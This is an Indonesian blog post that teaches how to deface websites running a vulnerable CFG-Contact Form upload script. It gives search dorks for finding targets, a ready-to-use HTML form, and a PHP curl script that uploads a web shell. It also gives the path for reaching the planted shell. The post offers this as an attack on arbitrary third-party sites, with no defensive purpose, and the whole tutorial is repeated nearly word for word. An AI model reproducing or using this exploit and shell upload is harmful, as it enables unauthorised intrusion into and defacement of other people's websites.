Deface Menggunakan CFG-Contact Form Vulnerability File Upload
Kali ini saya mau share tutorial mengenai salah satu teknik deface dengan metode Cfg-Contact Form.
Oke Langsung aja.
#Dork:
"/cfg-contactform-1/"
"/cfg-contactform-2/"
Cari target dengan dork diatas
Pilih salah satu target dan masukan Exploit dibawah ini
# Exploit tergantung contact form yang keberapa agan pilih
Contoh : www.site.com/[path]/cfg-contactform-1/inc/upload.php
Kalau ada tulisan {"filename":"blabla"} itu berarti vuln webnya.
Lalu upload shell dengan CSRF
CSRF :
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
Versi PHP
<?php
$uploadfile="shell.php";
$ch = curl_init("hurt.co.li/path/cfg-contactform-1/inc/upload.php
?folder=/cfg-contactform/upload/&fileext=php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Copy dan simpan dengan script diatas dengan format .html
Kalau sukses nanti ada tulisan ["filename":"shell.php"]
#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php [tergantung dork yang kalian pake]
Baca Juga
"/cfg-contactform-1/"
"/cfg-contactform-2/"
Pilih salah satu target dan masukan Exploit dibawah ini
# Exploit tergantung contact form yang keberapa agan pilih
Contoh : www.site.com/[path]/cfg-contactform-1/inc/upload.php
Kalau ada tulisan {"filename":"blabla"} itu berarti vuln webnya.
Lalu upload shell dengan CSRF
CSRF :
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
Versi PHP
<?php
$uploadfile="shell.php";
$ch = curl_init("hurt.co.li/path/cfg-contactform-1/inc/upload.php
?folder=/cfg-contactform/upload/&fileext=php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Copy dan simpan dengan script diatas dengan format .html
Kalau sukses nanti ada tulisan ["filename":"shell.php"]
#Acces Shell : www.target.co.li/[path]/cfg-contactform-1/upload/namashell.php [tergantung dork yang kalian pake]
Belum ada Komentar untuk "Deface Menggunakan CFG-Contact Form Vulnerability File Upload"
Posting Komentar